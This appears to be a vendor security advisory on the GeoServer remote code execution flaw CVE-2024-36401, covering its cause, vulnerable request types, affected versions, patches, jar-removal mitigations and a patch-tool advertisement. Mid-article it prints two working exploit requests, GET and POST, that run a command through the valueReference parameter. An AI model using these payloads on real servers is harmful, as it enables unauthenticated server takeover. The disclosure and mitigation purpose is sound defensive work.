GeoServer, an open-source tool used to share and modify geospatial data, is under attack. CVE-2024-36401, which impacts the GeoTools plugin, has a severity rating of 9.8 and arises from the unsafe evaluation of property names as XPath expressions. The GeoTools library API exposes property and attribute names for feature types to the commons-jxpath
library during processing, which can lead to the execution of arbitrary code.
According to The Shadowserver Foundation, the exploitation of CVE-2024-36401 started on July 9th, and the flaw was added to the CISA KEV shortly after.
Technical Details of CVE-2024-36401
The vulnerability (CVE-2024-36401) stems from the insecure handling of attribute names within the GeoTools library API, which GeoServer leverages. This vulnerability arises because the GeoTools API passes these attribute names to the commons-jxpath
library, a tool designed for parsing and evaluating XPath expressions. Under normal circumstances, XPath evaluations should be limited to complex feature types, such as those in Application Schema data stores. However, due to a flaw in the implementation, these evaluations are incorrectly extended to simple feature types as well.
This GeoServer flaw can be exploited through various parameters in OGC (Open Geospatial Consortium) requests. The following request types are known to be vulnerable:
- WFS GetFeature: This request is used to retrieve feature data from a Web Feature Service.
- WFS GetPropertyValue: It retrieves specific feature properties from a WFS.
- WMS GetMap: This request is for obtaining map images from a Web Map Service.
- WMS GetFeatureInfo: It fetches detailed information about features at specified locations on a map.
- WMS GetLegendGraphic: Requests a legend graphic corresponding to a map from a WMS.
- WPS Execute: Executes processes in a Web Processing Service.
Each of these requests can potentially be manipulated to exploit the vulnerability, leading to arbitrary code execution and posing significant security risks.
Though no official Proof of Concept has been released, many researchers have put out their own PoCs using GET and POST requests. Some examples of payloads used are shown below:
GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),'touch%20/tmp/success1') HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Connection: close
Cache-Control: max-age=0
POST /geoserver/wfs HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/xml
Content-Length: 356
<wfs:GetPropertyValue service='WFS' version='2.0.0'
xmlns:topp='http://www.openplans.org/topp'
xmlns:fes='http://www.opengis.net/fes/2.0'
xmlns:wfs='http://www.opengis.net/wfs/2.0'>
<wfs:Query typeNames='sf:archsites'/>
<wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'touch /tmp/success2')</wfs:valueReference>
</wfs:GetPropertyValue>
The different PoCs illustrate methods to achieve remote code execution on vulnerable servers, establish reverse shells, initiate outbound connections, or create files in the /tmp directory.
Impact and Products Affected by CVE-2024-36401
Around 16,462 GeoServer servers are exposed online, primarily in the US, China, Romania, Germany, and France. Given the active exploitation, CISA requires federal agencies to apply patches by August 5th, since this GeoServer flaw has the potential to lead to full server compromise and can be leveraged by unauthenticated attackers.
Vulnerable versions of GeoServer include:
- 2.25.x, versions prior to 2.25.2
- 2.24.x, versions prior to 2.24.4
- All versions prior to 2.23.6
Solutions and Mitigations
Patches are out! The vendor recommends updating your instance to GeoServer version 2.23.6, 2.24.4, or 2.25.2. Mitigations are available if you can’t patch your instance immediately, but they might invalidate some GeoServer functionality.
Mitigations for geoserver.war deploy:
- Stop the application server.
- Extract the contents of
geoserver.war
into a directory. - Navigate to the
WEB-INF/lib/
directory and remove thegt-complex-x.y.jar
file. - Compress the directory back into a new
geoserver.war
file. - Restart the application server.
Mitigations for GeoServer binary:
- Stop Jetty.
- Navigate to the
webapps/geoserver/WEB-INF/lib/
directory and remove thegt-complex-x.y.jar
file. - Restart Jetty.
Instantly Fix Risks with SanerNow Patch Management
SanerNow patch management is a continuous, automated, and integrated software that instantly fixes risks exploited in the wild. The software supports major operating systems like Windows, Linux, and macOS, as well as 550+ third-party applications.
It also allows you to set up a safe testing area to test patches before deploying them in a primary production environment. SanerNow patch management additionally supports a patch rollback feature in case of patch failure or a system malfunction.
Experience the fastest and most accurate patching software here.